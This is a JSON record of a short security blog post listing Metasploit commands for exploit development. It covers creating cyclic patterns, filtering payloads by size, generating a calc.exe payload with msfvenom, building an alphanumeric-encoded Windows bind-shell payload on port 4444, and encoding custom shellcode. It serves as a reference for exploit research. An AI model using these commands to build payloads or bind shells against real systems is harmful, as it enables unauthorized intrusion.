{"id":45,"date":"2018-01-13T15:56:09","date_gmt":"2018-01-13T15:56:09","guid":{"rendered":"http:\/\/malwrforensics.com\/en\/?p=45"},"modified":"2018-01-14T04:40:08","modified_gmt":"2018-01-14T04:40:08","slug":"useful-commands-for-exploit-development","status":"publish","type":"post","link":"https:\/\/malwrforensics.com\/en\/2018\/01\/13\/useful-commands-for-exploit-development\/","title":{"rendered":"Useful commands for exploit development"},"content":{"rendered":"\n<table id=\"tablepress-3\" class=\"tablepress tablepress-id-3\">\n<thead>\n<tr class=\"row-1\">\n\t<th class=\"column-1\">Command<\/th><th class=\"column-2\">Description<\/th>\n<\/tr>\n<\/thead>\n<tbody class=\"row-striping row-hover\">\n<tr class=\"row-2\">\n\t<td class=\"column-1\">.\/pattern_create.rb -l 5000<\/td><td class=\"column-2\">\tCreate a random pattern of 5000 chars<\/td>\n<\/tr>\n<tr class=\"row-3\">\n\t<td class=\"column-1\">.\/payload_lengths.rb | awk '$2<200'<\/td><td class=\"column-2\">Display all the payloads in metasploit that have the size less than 200<\/td>\n<\/tr>\n<tr class=\"row-4\">\n\t<td class=\"column-1\">msfvenom -a x86 --platform Windows -p windows\/exec cmd=calc.exe -f raw -b '\\x00\\x0d\\x0a' --smallest<\/td><td class=\"column-2\">\tGenerate the smallest payload that will execute calc.exe<\/td>\n<\/tr>\n<tr class=\"row-5\">\n\t<td class=\"column-1\">msfvenom msfvenom -a x86 --platform Windows -p windows\/shell\/bind_tcp -e x86\/alpha_mixed -f raw<\/td><td class=\"column-2\">Generate an alphanumeric bind payload (default port 4444)<\/td>\n<\/tr>\n<tr class=\"row-6\">\n\t<td class=\"column-1\">cat shellcode.bin | msfvenom -p - -a x86 --platform windows -e x86\/alpha_mixed -f raw > shellcode_alpha_mixed.bin<\/td><td class=\"column-2\">Encode a custom shellcode with x86\/alpha_mixed<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<!-- #tablepress-3 from cache -->\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[5,11,12,10],"class_list":["post-45","post","type-post","status-publish","format-standard","hentry","category-security","tag-exploit","tag-linux","tag-msfvenom","tag-shellcode"],"blocksy_meta":{"styles_descriptor":{"styles":{"desktop":"","tablet":"","mobile":""},"google_fonts":[]}},"featured_image_urls_v2":{"full":"","thumbnail":"","medium":"","medium_large":"","large":"","1536x1536":"","2048x2048":""},"post_excerpt_stackable_v2":"<p>CommandDescription .\/pattern_create.rb -l 5000 Create a random pattern of 5000 chars .\/payload_lengths.rb | awk &#8216;$2<\/p>\n","category_list_v2":"<a href=\"https:\/\/malwrforensics.com\/en\/category\/security\/\" rel=\"category tag\">Security<\/a>","author_info_v2":{"name":"malwrforensics","url":"https:\/\/malwrforensics.com\/en\/author\/u_malwrforensics\/"},"comments_num_v2":"0 comments","_links":{"self":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/45","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/comments?post=45"}],"version-history":[{"count":3,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/45\/revisions"}],"predecessor-version":[{"id":51,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/45\/revisions\/51"}],"wp:attachment":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/media?parent=45"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/categories?post=45"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/tags?post=45"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}